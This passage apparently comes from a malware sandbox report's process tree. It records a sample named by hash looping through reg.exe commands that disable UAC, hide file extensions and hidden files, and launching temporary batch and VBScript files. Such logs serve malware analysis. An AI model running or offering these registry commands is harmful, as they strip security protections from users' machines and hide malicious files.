C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
221⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
220⤵
PID:4480

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
220⤵
- UAC bypass
PID:224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vQsUgQsI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
220⤵
PID:4504

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
221⤵
PID:4208

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
221⤵
PID:4964

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
218⤵
PID:1572

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
218⤵
PID:1416

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
219⤵
PID:4192

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
218⤵
- UAC bypass
PID:2736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jCkgkMkk.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
218⤵
PID:968

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
219⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
216⤵
- Modifies visibility of file extensions in Explorer
PID:4672

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
216⤵
PID:1428

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
216⤵
PID:4752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DqUUUAkk.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
216⤵
PID:3212

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
217⤵
PID:1872

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
214⤵
- Modifies visibility of file extensions in Explorer
PID:2040

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
214⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
214⤵
- UAC bypass
- Modifies registry key
PID:688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bakswUIw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
214⤵
PID:1192

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
215⤵
PID:2224

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
212⤵
PID:1668

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
212⤵
PID:492

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
213⤵
PID:1912

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
212⤵
PID:2460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qmEsIAIg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
212⤵
PID:4132

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
213⤵
PID:2200

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
210⤵
- Modifies visibility of file extensions in Explorer
PID:2380

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
210⤵
PID:4448

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
210⤵
- Modifies registry key
PID:4900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iKgoIIoQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
210⤵
PID:1412

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
211⤵
PID:2404

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
208⤵
- Modifies visibility of file extensions in Explorer
PID:4804

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
208⤵
PID:736

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
208⤵
- UAC bypass
- Modifies registry key
PID:3756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OwMkoEII.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
208⤵
PID:644

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
209⤵
PID:440

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
209⤵
PID:3252

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
206⤵
- Modifies visibility of file extensions in Explorer
PID:452

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
206⤵
PID:744

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
206⤵
- UAC bypass
PID:4560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\icAIEAUI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
206⤵
PID:944

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
207⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
204⤵
- Modifies visibility of file extensions in Explorer
PID:2488

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
204⤵
PID:2848

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
205⤵
PID:2324

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
204⤵
PID:2320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BYwkEcYY.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
204⤵
PID:3208

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
205⤵
PID:3432

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
205⤵
PID:3752

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
202⤵
- Modifies registry key
PID:1348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
202⤵
PID:4852

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
202⤵
PID:1912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vWQMoMwo.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
202⤵
PID:2268

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
203⤵
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
200⤵
- Modifies visibility of file extensions in Explorer
PID:3700

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
200⤵
PID:232

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
201⤵
PID:2156

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
200⤵
- UAC bypass
PID:2228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xcwEIYsw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
200⤵
PID:4436

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
201⤵
PID:3960

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
198⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
198⤵
PID:2312

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
198⤵
- UAC bypass
PID:4548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZikkggwA.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
198⤵
PID:1396

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
199⤵
PID:4384

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
196⤵
PID:760

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
197⤵
PID:1264

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
196⤵
PID:2532

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
196⤵
PID:5108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UGcQEsgE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
196⤵
PID:3204

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
197⤵
PID:2112

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
194⤵
- Modifies visibility of file extensions in Explorer
PID:792

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
194⤵
- Modifies registry key
PID:2488

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
194⤵
- UAC bypass
- Modifies registry key
PID:2372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AicYgIkk.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
194⤵
PID:540

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
195⤵
PID:2608

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
192⤵
PID:3376

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
192⤵
PID:3280

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
192⤵
PID:2460

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
193⤵
PID:2268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msoocEEg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
192⤵
PID:1076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
193⤵
PID:4440

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
193⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
190⤵
- Modifies registry key
PID:5068

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
190⤵
PID:3000

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
190⤵
- UAC bypass
PID:1400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CsMQsggE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
190⤵
PID:1412

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
191⤵
PID:224

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
188⤵
- Modifies visibility of file extensions in Explorer
PID:3992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
188⤵
PID:2764

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
188⤵
- UAC bypass
PID:5036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EQswwAsk.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
188⤵
PID:4044

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
189⤵
PID:3232

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
186⤵
PID:732

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
187⤵
PID:5108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
186⤵
PID:1852

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
186⤵
- UAC bypass
- Modifies registry key
PID:2364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JeUcIwEc.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
186⤵
PID:3928

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
187⤵
PID:4752

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
184⤵
- Modifies visibility of file extensions in Explorer
PID:4852

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
185⤵
PID:3224

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
184⤵
- Modifies registry key
PID:4812

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
185⤵
PID:2372

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
184⤵
- UAC bypass
PID:4056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZSsIQgco.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
184⤵
PID:1512

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
185⤵
PID:2940

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
185⤵
PID:3912

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
182⤵
PID:4996

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
182⤵
- Modifies registry key
PID:4332

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
182⤵
- Modifies registry key
PID:2456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zSEIIwkg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
182⤵
PID:4860

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
183⤵
PID:1968

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
180⤵
- Modifies visibility of file extensions in Explorer
PID:1924

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
180⤵
PID:4532

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
181⤵
PID:1400

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
180⤵
- UAC bypass
PID:3856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XGEsQsEQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
180⤵
PID:232

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
181⤵
PID:3700

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
178⤵
- Modifies visibility of file extensions in Explorer
PID:1572

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
179⤵
PID:2632

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
178⤵
- Modifies registry key
PID:436

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
178⤵
- UAC bypass
PID:5036

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
179⤵
PID:632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fGYwQsYE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
178⤵
PID:2312

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
179⤵
PID:1896

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
176⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3212

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
177⤵
PID:2848

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
176⤵
- Modifies registry key
PID:2364

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
176⤵
PID:4132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MqUsccsk.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
176⤵
PID:1688

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
177⤵
PID:816

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
174⤵
- Modifies visibility of file extensions in Explorer
PID:3208

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
175⤵
PID:2588

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
174⤵
PID:3264

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
174⤵
PID:1668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wyssIwIY.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
174⤵
PID:1392

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
175⤵
PID:2496

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
172⤵
PID:3188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
172⤵
PID:4844

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
173⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
172⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wUAssQkU.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
172⤵
PID:3736

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
173⤵
PID:4976

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
170⤵
- Modifies visibility of file extensions in Explorer
PID:3016

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
170⤵
PID:616

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
170⤵
- Modifies registry key
PID:2600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zAIswMgc.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
170⤵
PID:3080

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
171⤵
PID:4768

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
168⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2236

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
168⤵
- Modifies registry key
PID:4544

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
168⤵
- UAC bypass
PID:5044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BGUMsYMI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
168⤵
PID:2544

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
169⤵
PID:548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
166⤵
PID:3376

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
167⤵
PID:5048

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
166⤵
- Modifies registry key
PID:3208

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
166⤵
- Modifies registry key
PID:1668

C:\Windows\SysWOW64\cmd.exe
